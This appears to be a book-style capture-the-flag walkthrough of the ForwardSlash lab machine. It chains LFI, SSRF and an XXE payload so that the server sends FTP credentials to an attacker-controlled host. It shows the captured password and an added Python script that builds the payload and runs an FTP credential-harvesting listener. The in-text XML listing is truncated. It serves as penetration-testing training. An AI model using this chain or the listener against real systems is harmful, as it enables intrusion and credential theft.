Exercise: Enumerating and exploiting XXE on ForwardSlash

We covered the first part of this machine in Chapter 2, where we discovered the virtual host backup.forwardslash.htb, which presents a login page. We can enumerate this site with gobuster, looking for directories and PHP files:
└──╼ $gobuster dir -t 50 \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -u
/login.php (Status: 200)
/register.php (Status: 200)
/index.php (Status: 302)
/welcome.php (Status: 302)
/dev (Status: 301)
/api.php (Status: 200)
/environment.php (Status: 302)
/logout.php (Status: 302)
/config.php (Status: 200)
/hof.php (Status: 302)
If we try to go to the /dev directory, we get a 403 Access Denied:
403 Access Denied
Access Denied From
The server is restricting access to this directory by source IP address, so it is not reachable from outside. The login page does have a link to /register.php, so we can create an account on the site there. Using the new credentials, we can log in and get access to a dashboard page.
Dashboard home page for users on ForwardSlash
The page of interest is the one for changing your profile picture, which reports that the functionality has been disabled after the site was hacked.
Change profile picture page on ForwardSlash
The text box and Submit button have been disabled by adding the attribute disabled="" into the HTML for these elements. If you right click on the web page in the browser and select Inspect Element, you will be able to see the HTML for the page in the Inspector tab of the browser developer tools (Figure 3-7).
Inspecting the HTML code for the page profilepicture.php
Double-click the disabled attribute on each of the two form elements in the Inspector and delete it; the text box and Submit button are now usable again. We can now test for Local File Inclusion (LFI) by pointing the url parameter at a local file such as /etc/passwd: switch FoxyProxy to the Burp proxy, enter ../../../etc/passwd into the text box and press Submit. Once the request is intercepted in Burp, send it to the Repeater tab and press Send. The response includes the file:
HTTP/1.1 200 OK
<!DOCTYPE html>
<meta charset="UTF-8">
<link rel="stylesheet" href="bootstrap.css">
<style type="text/css">
body{ font: 14px sans-serif; text-align: center; }
<div class="page-header">
<h1>Change your Profile Picture!</h1>
<font style="color:red">This has all been disabled while we try to get
back on our feet after the hack.<br><b>-Pain</b></font>
<form action="/profilepicture.php" method="post">
<input type="text" name="url" disabled style="width:600px"><br>
<input style="width:200px" type="submit" value="Submit" disabled>
mysql:x:111:113:MySQL Server,,,:/nonexistent:/bin/false
Among the entries in /etc/passwd are two users of interest, pain and chiv. If we now point the same parameter at the /dev directory, the server includes /dev/index.php for us and we can read its contents:
<h1>XML Api Test</h1>
<h3>This is our api test for when our new website gets refurbished</h3>
<form action="/dev/index.php" method="get" id="xmltest">
<textarea name="xml" form="xmltest" rows="20" cols="50"><api>
<input type="submit">
<!-- TODO:
Fix FTP Login
Recall that we got a 403 error when we tried to access this directory directly, with an error message saying it could not be accessed from our IP address. The LFI has given us a Server Side Request Forgery (SSRF): the request for /dev/index.php is now made by the web server itself, so the source-IP restriction does not apply.
The returned page is a test harness that parses XML input, so the natural next step is to test it for XML External Entity (XXE) injection. Working out that the XML should provoke an FTP login takes something of a leap of faith, but the TODO comment to "Fix FTP Login" is the clue: the script evidently performs an FTP login, and if we can make it connect to a host we control, we can capture the credentials it uses. We can construct an XML document for this as follows:
<?xml version="1.0" ?>
<!DOCTYPE html [
<!ELEMENT bar >
We then deliver this to /dev/index.php through the profile picture request in Burp, setting the url parameter to http://backup.forwardslash.htb/dev/index.php?xml=<XXE code>. The XML needs to be URL encoded twice: once because it is a query-string value for /dev/index.php, and again because that whole URL is itself the value of the url parameter in our POST. Select the XML code in Burp, right click and select URL encode all characters, then repeat this on the result. Before sending the request, start responder so that it listens for FTP connections and prints out the username and password that the client supplies:
└──╼ $sudo responder -I tun0
[+] Servers:
FTP server [ON]
When the request is sent in Burp, we get a hit:
[+] Listening for events...
[FTP] Cleartext Client :
[FTP] Cleartext Username : chiv
[FTP] Cleartext Password : N0bodyL1kesBack/
These are valid SSH credentials, giving us a shell on the box as the user chiv. That user cannot read the user flag, so some lateral movement to the user pain is required. That involves another SUID binary, which we leave as an exercise for later.
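The whole chain above, as an added example that is not from the book or from the ForwardSlash machine: a Python script that builds the double-encoded profile picture request and runs a minimal FTP credential listener in the style of Responder's FTP module. The hostname, the /profilepicture.php url parameter, /dev/index.php?xml= and the chiv credentials come from the page; the attacker address 10.10.14.2, the entity name xxe, the element names in the XML, and all the function and class names (xxe_payload, ssrf_body, what_each_hop_sees, FtpCredentialCapture, simulate_capture) are my own assumptions. The XML document is a generic external-entity payload rather than the page's exact one, whose listing is cut off, and in simulate_capture the ftplib client stands in for the target's XML parser connecting back to us, so everything runs offline.

```python
"""Added example, not the book's code: delivery and capture halves of the
SSRF -> XXE -> FTP credential chain.  Names, the attacker address and the
XML element names are placeholders (see the lead-in)."""
from __future__ import annotations

import ftplib
import socket
import threading
from urllib.parse import parse_qsl, quote, urlencode, urlsplit

TARGET = "http://backup.forwardslash.htb"   # from the page
ATTACKER = "10.10.14.2"                      # placeholder: our VPN address


def xxe_payload(attacker_host: str = ATTACKER, entity: str = "xxe") -> str:
    """Generic XXE document (placeholder, not the page's exact payload): an
    external entity that makes the server's XML parser open an ftp:// URL we
    control, which is what puts its FTP login on the wire."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE api [<!ENTITY {entity} SYSTEM "ftp://{attacker_host}/">]>\n'
        f'<api><request>&{entity};</request></api>'
    )


def ssrf_body(xml: str, target: str = TARGET) -> str:
    """POST body for /profilepicture.php.  The XML is percent-encoded once so
    it is a valid query-string value for /dev/index.php, and the resulting
    inner URL is encoded again because it travels as the value of the outer
    'url' parameter.  This is the double encoding done by hand in Burp."""
    inner = f"{target}/dev/index.php?xml={quote(xml, safe='')}"
    return urlencode({"url": inner})


def what_each_hop_sees(body: str) -> tuple[str, str]:
    """Undo the two encodings in the order the two PHP pages would: the outer
    page reads $_POST['url'] and fetches it; the inner page reads $_GET['xml']."""
    outer_url = dict(parse_qsl(body))["url"]
    xml = dict(parse_qsl(urlsplit(outer_url).query))["xml"]
    return outer_url, xml


class FtpCredentialCapture:
    """Minimal stand-in for Responder's FTP module: speak just enough FTP to
    get a USER/PASS pair out of whoever connects, record it, refuse the login."""

    def __init__(self, host: str = "127.0.0.1", port: int = 0):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))
        self.sock.listen(1)
        self.port = self.sock.getsockname()[1]   # port 0 -> kernel picks one
        self.captured = []                        # (client ip, user, password)
        self._thread = threading.Thread(target=self._serve_one, daemon=True)

    def start(self) -> FtpCredentialCapture:
        self._thread.start()
        return self

    def wait(self, timeout: float = 5.0) -> list:
        self._thread.join(timeout)
        self.sock.close()
        return self.captured

    def _serve_one(self) -> None:
        user = None
        try:
            conn, (client_ip, _) = self.sock.accept()
            conn.settimeout(5)
            with conn, conn.makefile("r", encoding="latin-1", newline="\r\n") as lines:
                conn.sendall(b"220 ftp ready\r\n")
                for line in lines:
                    verb, _, arg = line.rstrip("\r\n").partition(" ")
                    if verb.upper() == "USER":
                        user = arg
                        conn.sendall(b"331 Password required\r\n")
                    elif verb.upper() == "PASS":
                        self.captured.append((client_ip, user, arg))
                        conn.sendall(b"530 Login incorrect\r\n")
                        return                     # got what we came for
                    else:
                        conn.sendall(b"530 Please login with USER and PASS\r\n")
        except OSError:
            pass                                   # client went away or timed out


def simulate_capture(user: str, password: str) -> tuple:
    """Offline rehearsal of the capture step: ftplib plays the role of the
    target's XML parser connecting back to our listener."""
    listener = FtpCredentialCapture().start()
    client = ftplib.FTP()
    client.connect("127.0.0.1", listener.port, timeout=5)
    try:
        client.login(user, password)
    except ftplib.error_perm:
        pass                                       # 530 is expected; creds are already ours
    finally:
        client.close()
    return listener.wait()[0]


if __name__ == "__main__":
    body = ssrf_body(xxe_payload())
    print("POST /profilepicture.php body:", body)
    print("inner URL and XML as seen by /dev/index.php:", what_each_hop_sees(body))
    print("captured:", simulate_capture("chiv", "N0bodyL1kesBack/"))
```

Running the file prints the doubly encoded body (note the %253C where a single encoding would give %3C), shows that decoding it in the same two steps the PHP pages perform recovers the original XML, and shows the credentials recorded by the listener. Against the real box you would paste the body into the Repeater request instead of calling simulate_capture and leave responder -I tun0 listening on the VPN interface.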